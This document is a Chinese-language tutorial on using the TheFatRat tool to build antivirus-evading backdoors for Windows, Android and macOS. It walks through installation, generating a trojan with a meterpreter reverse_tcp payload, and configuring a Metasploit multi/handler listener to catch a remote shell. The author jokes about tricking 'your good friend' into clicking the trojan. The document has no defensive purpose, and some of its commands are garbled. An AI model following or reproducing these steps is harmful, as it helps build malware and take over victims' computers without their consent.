在这篇文章中,我将教大家如何使用TheFatRat这款工具。这款工具可以帮大家构建后门程序,以及执行后渗透利用攻击等等。在主流Payload的帮助下,这款工具可以生成质量非常高的恶意软件,而这些恶意软件可以在Windows、Android和macOS平台上运行。
自动化metasploit功能还具备下列特点
1. 针对Windows、Linux、Mac和Android创建后门;
2. 后门可绕过反病毒产品;
3. 检测/开启Metasploit服务;
4. 针对Windows、Linux、Android和macOS创建meterpreterreverse_tcp Payload;
5. 开启多个meterpreter reverse_tcp监听器;
6. Searchsploit快速搜索;
7. 绕过反病毒产品;
8. 使用其他技术创建后门;
9. 自动运行监听器脚本;
安装指南
git clone https://github.com/Screetsec/TheFatRat.git cd Fatrat
提取lalin-master to your home or another folder
chmod x fatrat
接下来,我们需要提供执行权限并运行setup.sh。
chmod x setup.sh && ./setup.sh 安装结束过后,会让你选择是否生成桌面图标,建议生成,安装过程全部自动化会自动下载未满足的插件
启动完成图
自动生成木马选择1号选项
然后选择你想生产的木马的针对系统,这里我使用win的靶机,选择2选项
上方贴心的写出了你在去区域网中的ip地址,直接复制粘贴即可。
在这里我们需要输入我们想生成的木马名,我输入test
在这里我们需要注意,我们是主动链接还是被动链接,都有一定的用法,不过,在区域网中,显然第3个选项比较适合,输入3
系统便开始自动生成和加密(几乎无用)一个木马,生成好后,到这个文件夹下找。
/root/TheFatRat/output/
随后我们就可以使用这个木马了,比如让你的好朋友点击一下,哈哈哈。
这里我们就直接放到虚拟机中运行。
在点击之前,我们需要设置msf的监听
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 刚刚设置的ip set lport 刚刚设置的端口
输入exploit,开始监听。然后运行木马,就可以获取到目标主机的shell了。
,